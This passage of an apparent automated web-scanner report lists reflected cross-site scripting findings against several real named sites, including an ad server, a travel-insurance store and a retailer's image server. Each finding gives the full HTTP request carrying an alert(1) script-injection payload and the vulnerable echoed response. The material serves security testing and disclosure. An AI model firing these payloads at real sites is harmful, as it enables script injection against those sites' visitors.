User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225f2931"><script>alert(1)</script>55800ca2451/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.6. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b9b4"><script>alert(1)</script>ed9624c5b60 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH6b9b4"><script>alert(1)</script>ed9624c5b60;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH6b9b4"><script>alert(1)</script>ed9624c5b60;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.7. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48be4"><script>alert(1)</script>b94f62885a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]&48be4"><script>alert(1)</script>b94f62885a9=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 288

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]&48be4"><script>alert(1)</script>b94f62885a9=1;adiframe=y">
...[SNIP]...

3.8. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62e7"><script>alert(1)</script>2ee57e1ea08 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]f62e7"><script>alert(1)</script>2ee57e1ea08 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group]f62e7"><script>alert(1)</script>2ee57e1ea08;adiframe=y">
...[SNIP]...

3.9. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a9a66><script>alert(1)</script>e3dd50b670a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225/ADTECH;target=a9a66><script>alert(1)</script>e3dd50b670a HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=a9a66><script>alert(1)</script>e3dd50b670a><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0/225/ADTECH;target=
...[SNIP]...

3.10. http://buy.travelguard.com/tgi2/pct/default.aspx [_TSM_HiddenField_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/pct/default.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d513'%3balert(1)//05c09b48c56 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as 9d513';alert(1)//05c09b48c56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/pct/default.aspx?_TSM_HiddenField_=ctl00_ctl00_purchasePathContainer_scriptManager_HiddenField9d513'%3balert(1)//05c09b48c56&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.10920.32880%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3a816bbca1-959d-46fd-928f-6347d6f2c9c3%3ae2e86ef9%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a1df13a87%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e%3a182913ba%3abae32fb7 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://buy.travelguard.com/tgi2/pct/default.aspx?br=tgdirect&pc=PCTDS-GMP&intcmp=clc-001-WYWICust-Stkd-Top-B1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1475064262442%3B%20gpv_pageName%3Dus_direct%253A/MVT_Redirect/%7C1317386062687%3B%20s_depth%3D2%7C1317386062691%3B%20s_pers_prop21%3D000329%7C1475064262766%3B; s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-WYWICust-Stkd-Top-B1%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:07:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Sat, 29 Sep 2012 12:07:43 GMT
Last-Modified: Mon, 11 Jul 2011 17:25:19 GMT
Content-Type: application/x-javascript
Content-Length: 272825

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
MaskedEdit.MaskedEditBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ctl00_purchasePathContainer_scriptManager_HiddenField9d513';alert(1)//05c09b48c56').value += ';;AjaxControlToolkit, Version=1.0.10920.32880, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:816bbca1-959d-46fd-928f-6347d6f2c9c3:e2e86ef9:a9a7729d:9ea3f0e2:9e8e87e9:1df13a87:4c98
...[SNIP]...

3.11. http://buy.travelguard.com/tgi2/pct/default.aspx [br parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/pct/default.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ca8'%3balert(1)//8ccd711ec0c was submitted in the br parameter. This input was echoed as 39ca8';alert(1)//8ccd711ec0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tgi2/pct/default.aspx?br=tgdirect39ca8'%3balert(1)//8ccd711ec0c&pc=PCTDS-GMP&intcmp=clc-001-WYWICust-Stkd-Top-B1 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelguard.com/MVT_Redirect/?br=tgdirect&pc=PCTDS-GMP&intcmp=clc-001-WYWICust-Stkd-Top-B1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1475064262442%3B%20gpv_pageName%3Dus_direct%253A/MVT_Redirect/%7C1317386062687%3B%20s_depth%3D2%7C1317386062691%3B%20s_pers_prop21%3D000329%7C1475064262766%3B; s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-WYWICust-Stkd-Top-B1%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:10:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 96131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   PCT Trip Details
</title><link h
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect39ca8';alert(1)//8ccd711ec0c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

3.12. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5b813--><script>alert(1)</script>42354065ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss+desktop+se/5b813--><script>alert(1)</script>42354065ffbrver HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:52 GMT
Vary: Accept-Encoding
Content-Length: 13609
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
<input type="text" name="q" value="xss desktop se/5b813--><script>alert(1)</script>42354065ffbrver" />
...[SNIP]...

3.13. http://computerrentals.com/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 908aa</script><script>alert(1)</script>fcdc7750642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xss+desktop+se/908aa</script><script>alert(1)</script>fcdc7750642rver HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:48 GMT
Vary: Accept-Encoding
Content-Length: 13621
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
ormRoot('cse-search-form');
                                       options.setAutoComplete(true);
                                       
                                       customSearchControl.draw('cse', options);
                                                                                   customSearchControl.execute('xss desktop se/908aa</script><script>alert(1)</script>fcdc7750642rver');
                                                                           }, true);
                               </script>
...[SNIP]...

3.14. http://computerrentals.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a5c6</script><script>alert(1)</script>8e5b253ccc9 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?q=xss+desktop+server5a5c6</script><script>alert(1)</script>8e5b253ccc9 HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:29 GMT
Vary: Accept-Encoding
Content-Length: 13619
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
Root('cse-search-form');
                                       options.setAutoComplete(true);
                                       
                                       customSearchControl.draw('cse', options);
                                                                                   customSearchControl.execute('xss desktop server5a5c6</script><script>alert(1)</script>8e5b253ccc9');
                                                                           }, true);
                               </script>
...[SNIP]...

3.15. http://computerrentals.com/search.php [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://computerrentals.com
Path:   /search.php

Issue detail

The value of the q request parameter is copied into an HTML comment. The payload 3f8c1--><script>alert(1)</script>74fb586f5cd was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?q=xss+desktop+server3f8c1--><script>alert(1)</script>74fb586f5cd HTTP/1.1
Host: computerrentals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://computerrentals.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=195380158.1979599955.1317385513.1317385513.1317385513.1; __utmb=195380158.1.10.1317385513; __utmc=195380158; __utmz=195380158.1317385513.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:28:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=604800
Expires: Fri, 07 Oct 2011 12:28:33 GMT
Vary: Accept-Encoding
Content-Length: 13607
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>CRE - Computer Rentals &amp; AV Solutions Search Results for Technology
...[SNIP]...
<input type="text" name="q" value="xss desktop server3f8c1--><script>alert(1)</script>74fb586f5cd" />
...[SNIP]...

3.16. http://dms.netmng.com/si/cm/tracking/si/CM/Tracking/ClickTracking.aspx [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/cm/tracking/si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d54'%3balert(1)//1f2bc4e80a5 was submitted in the u parameter. This input was echoed as 69d54';alert(1)//1f2bc4e80a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/cm/tracking/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=1&u=69d54'%3balert(1)//1f2bc4e80a5 HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.travelguard.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:05:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 739
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != '' ||sipageurl.search(/sisearchengine=/i)>=0 ){ if((sipageurl.split('/')[2] != sirefurl.split('/')[2])){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3489&jscript=0&u=69d54';alert(1)//1f2bc4e80a5';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

3.17. http://e.targetfuel.com/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://e.targetfuel.com
Path:   /

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 20e21<script>alert(1)</script>7f372d558b5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?sid=c4efaaaa-166e-4641-8342-a5d43008a6da&url=http%3A%2F%2Fwww.homedepot.ca%2Fwebapp%2Fwcs%2Fstores%2Fservlet%2FHome%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&rurl=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&callback=jQuery15107517646802589297_131738416077120e21<script>alert(1)</script>7f372d558b5&pv%5Bpv%5D=1&pc%5Bpc%5D=1&_=1317384160773 HTTP/1.1
Host: e.targetfuel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 30 Sep 2011 12:03:26 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Server: Apache/2.2.20 (Amazon)
Set-Cookie: xs-c4efaaaa-166e-4641-8342-a5d43008a6da-vid=2609eeb2-4c35-4649-9eea-d330adc4f7ff; path=/; domain=.targetfuel.com
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Content-Length: 134
Connection: keep-alive


jQuery15107517646802589297_131738416077120e21<script>alert(1)</script>7f372d558b5({vid: "2609eeb2-4c35-4649-9eea-d330adc4f7ff"})

3.18. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fingerhut.tt.omtrdc.net
Path:   /m2/fingerhut/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e76be<script>alert(1)</script>a0d7c65495 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1317385467182-654123&mboxPage=1317385467182-654123&screenHeight=1200&screenWidth=1920&browserWidth=1083&browserHeight=877&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=FHTOCP_welcomee76be<script>alert(1)</script>a0d7c65495&mboxId=0&mboxTime=1317367467591&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Fri, 30 Sep 2011 12:25:18 GMT
Server: Test & Target

mboxFactories.get('default').get('FHTOCP_welcomee76be<script>alert(1)</script>a0d7c65495',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317385467182-654123.19");

3.19. http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/AC_close_052110

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de589<img%20src%3da%20onerror%3dalert(1)>0d8ae2ced7c was submitted in the REST URL parameter 4. This input was echoed as de589<img src=a onerror=alert(1)>0d8ae2ced7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/AC_close_052110de589<img%20src%3da%20onerror%3dalert(1)>0d8ae2ced7c?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
